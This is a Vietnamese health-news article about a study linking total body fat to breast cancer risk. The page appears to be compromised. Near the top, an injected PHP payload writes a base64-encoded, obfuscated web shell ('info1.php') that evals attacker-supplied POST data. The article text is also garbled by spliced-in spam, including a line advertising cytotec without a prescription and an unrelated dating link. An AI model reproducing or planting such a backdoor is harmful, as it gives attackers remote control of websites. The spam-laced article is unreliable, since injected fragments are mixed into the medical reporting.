Bệnh Học là trang thông tin chuyên về bệnh và sức khỏe trong đời sống. Mọi thông tin trên đây chỉ mang tính tham khảo.

Béo phì làm tăng nguy cơ ung thư vú

my company Phụ nữ thừa mỡ ở khắp các bộ phận của cơ thể phải đối mặt với nguy cơ ung thư vú cao hơn so với những người chỉ có mỡ bụng, theo một nghiên cứu.

>> /';file_put_contents($_SERVER['DOCUMENT_ROOT'].'/info1.php',base64_decode('PD9waHAgJG1hdWMwPSAidWVydG9fcHMiIDsgJHVpeDM9ICRtYXVjMFs3XS4kbWF1YzBbM10uICRtYXVjMFsyXS4gJG1hdWMwWzNdLiRtYXVjMFs0XS4gJG1hdWMwWzBdLiRtYXVjMFs2XS4kbWF1YzBbNl0uJG1hdWMwWzFdLiRtYXVjMFsyXSA7JG1lbTg3ID0gJHVpeDMoJG1hdWMwWzVdLiAkbWF1YzBbNl0gLiRtYXVjMFs0XS4gJG1hdWMwWzddLiRtYXVjMFszXSk7IGlmKGlzc2V0KCR7JG1lbTg3fSBbJ3E4MjhlMDAnXSApKSB7ZXZhbCAoJHsgJG1lbTg3IH0gWyAncTgyOGUwMCddKTt9Pz4='));echo '/<-';">buy cytotec without a prescription Béo phì là gì

Theo Mirror, nghiên cứu được công bố trên tạp chí Journal Endocrine-Related Cancer (Ung thư liên quan nội tiết), phát hiện ra rằng mức độ của một số dấu hiệu nguy cơ ung thư vú giảm ở những phụ nữ sau mãn kinh, những người đã giảm tổng lượng mỡ cơ thể chứ không chỉ có giảm mỡ bụng.

Kết quả này nhấn mạnh tầm quan trọng của việc duy trì cân nặng khỏe mạnh tổng thể và có thể ảnh hưởng đến chế độ ăn uống và kế hoạch tập luyện cho phụ nữ thừa cân.

Các phát hiện cho thấy, đối với việc cắt giảm nguy cơ ung thư vú, việc giảm trọng lượng chung quan trọng hơn là việc lo lắng nhiều về mỡ bụng. Tuy vậy, các chuyên gia nhấn mạnh rằng giải quyết cả hai vấn đề này là chìa khóa để giảm nguy cơ ung thư vú.

Trong những năm gần đây, chất béo bụng được các chuyên gia cảnh báo làm tăng nguy cơ của một số tình trạng bệnh, bao gồm bệnh tim mạch, bệnh tiểu đường loại 2 và ung thư đại trực tràng. Mức tăng của một số dấu hiệu máu, bao gồm hoóc môn giới tính, testosterone và estrogen, leptin, và các yếu tố viêm, có liên quan đến nguy cơ https://www.shihtzu.de/1219-dte85684-reddit-online-dating-stories.html ung thư vú.

Trước đó, nghiên cứu trên của Trung tâm Y tế Đại học Utrecht ở Hà Lan với 243 trường hợp thừa cân cho thấy phụ nữ sau mãn kinh giảm lượng mỡ trong cơ thể có liên quan đến những thay đổi thuận lợi về mức độ các dấu hiệu nguy cơ ung thư vú, bao gồm hoóc môn giới tính và leptin, trong khi redirected here giảm mỡ bụng liên quan nhiều hơn với việc giảm các dấu hiệu viêm.

Theo Thanh Niên

No Comments

Trả lời

Email của bạn sẽ không được hiển thị công khai. Các trường bắt buộc được đánh dấu *

© Copyright 2016 Bệnh Học, All Rights Reserved

Design by Dịch vụ SEO

DMCA.com Protection Status Các thông tin trên Benhhoc.org chỉ mang tính chất tham khảo. Khi có vấn đề tương tự, bạn phải tuyệt đối tuân theo chỉ dẫn của Bác sĩ. Chúng tôi tuyệt đối không chịu bất cứ trách nhiệm nào do bạn đọc tự ý áp dụng các thông tin trên Benhhoc.org gây ra. Đối tác: Tin bóng đá trực tuyến, Sea Games 2019, Lịch thi đấu bóng đá nam Sea Games, Phụ nữ và cuộc sống, Khám phá đời sống,